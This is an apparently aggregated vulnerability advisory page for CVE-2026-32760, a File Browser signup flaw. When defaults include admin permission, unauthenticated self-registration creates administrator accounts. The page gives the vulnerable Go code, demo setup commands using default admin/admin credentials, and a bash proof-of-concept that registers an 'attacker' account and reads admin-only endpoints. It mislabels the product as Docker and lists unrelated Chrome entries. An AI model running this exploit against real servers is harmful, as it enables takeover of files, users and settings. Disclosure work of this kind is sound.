Docker CVE-2026-32760
CRITICAL
GHSA-5gg9-5g7w-hm73
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
4DescriptionNVD
Summary
Any unauthenticated visitor can register a full administrator account when self-registration (signup = true) is enabled and the default user permissions have perm.admin = true. The signup handler blindly applies all default settings - including Perm.Admin - to the new user without any server-side guard that strips admin from self-registered accounts.
Details
Affected file: http/auth.go
Vulnerable code:
// signupHandler (http/auth.go)
user := &users.User{
Username: info.Username,
}
d.settings.Defaults.Apply(user) // ← copies Perm.Admin = true if set in defaults
// NO guard: user.Perm.Admin is never cleared heresettings.UserDefaults.Apply (settings/defaults.go):
func (d *UserDefaults) Apply(u *users.User) {
u.Perm = d.Perm // copies full Permissions struct, including Admin field
...
}Settings API permits Admin in defaults (http/settings.go):
var settingsPutHandler = withAdmin(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
...
d.settings.Defaults = req.Defaults // Admin can set Defaults.Perm.Admin = true
...
})The signupHandler is supposed to create unprivileged accounts for new visitors. It contains no explicit user.Perm.Admin = false reset after Defaults.Apply. If an administrator (intentionally or accidentally) configures defaults.perm.admin = true and also enables signup, every account created via the public registration endpoint is an administrator with full control over all files, users, and server settings.
Demo Server Setup
# Pull latest release
docker run -d --name fb-test \
-p 8080:80 \
-v /tmp/fb-data:/srv \
filebrowser/filebrowser:v2.31.2
# Wait for startup, then set defaults.perm.admin = true
ADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
-H 'Content-Type: application/json' \
-d '{"username":"admin","password":"admin"}')
# Enable signup and set admin as default permission
curl -s -X PUT http://localhost:8080/api/settings \
-H "X-Auth: $ADMIN_TOKEN" \
-H 'Content-Type: application/json' \
-d '{
"signup": true,
"defaults": {
"perm": {
"admin": true,
"execute": true,
"create": true,
"rename": true,
"modify": true,
"delete": true,
"share": true,
"download": true
}
}
}'PoC Exploit
#!/bin/bash
# poc_signup_admin.sh
# Demonstrates: unauthenticated signup → admin account
TARGET="http://localhost:8080"
echo "[*] Registering attacker account via public signup endpoint..."
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "$TARGET/api/signup" \
-H "Content-Type: application/json" \
-d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Signup response: HTTP $STATUS"
echo "[*] Logging in as newly created account..."
ATTACKER_TOKEN=$(curl -s -X POST "$TARGET/api/login" \
-H "Content-Type: application/json" \
-d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Fetching user list with attacker token (admin-only endpoint)..."
curl -s "$TARGET/api/users" \
-H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool
echo ""
echo "[*] Verifying admin access by reading /api/settings..."
curl -s "$TARGET/api/settings" \
-H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.toolExpected output: The attacker's token successfully returns the full user list and server settings - endpoints restricted to Perm.Admin = true users.
Impact
Any unauthenticated visitor who can reach POST /api/signup obtains a full admin account. From there, they can:
- List, read, modify, and delete every file on the server
- Create, modify, and delete all other users
- Change authentication method and server settings
- Execute arbitrary commands if
enableExec = true
AnalysisAI
Unauthenticated attackers can register administrator accounts in Docker when self-registration is enabled and default user permissions include admin privileges, as the signup handler fails to strip admin permissions from self-registered accounts. Public exploit code exists for this vulnerability. …
Sign in for full analysis, threat intelligence, and remediation guidance.
RemediationAI
Within 24 hours: disable self-registration (signup = false) immediately and audit all user accounts created since deployment for unauthorized administrators. Within 7 days: review and remove perm.admin = true from default user permissions settings, implement mandatory approval workflows for administrator account creation, and conduct forensic analysis of access logs for unauthorized activity. …
Sign in for detailed remediation steps.
More from same product – last 7 days
Remote code execution in Google Chrome desktop versions prior to 148.0.7778.216 allows a remote attacker to execute arbi
Heap corruption in Google Chrome's PDFium component (versions prior to 148.0.7778.216) allows a remote attacker to poten
Cross-origin data leakage in Google Chrome versions prior to 148.0.7778.216 stems from an integer overflow in the ANGLE
Type confusion in the V8 JavaScript engine of Google Chrome before 148.0.7778.216 enables arbitrary code execution withi
Remote code execution in Google Chrome versions prior to 148.0.7778.216 stems from a use-after-free flaw in the SVG rend
Vendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today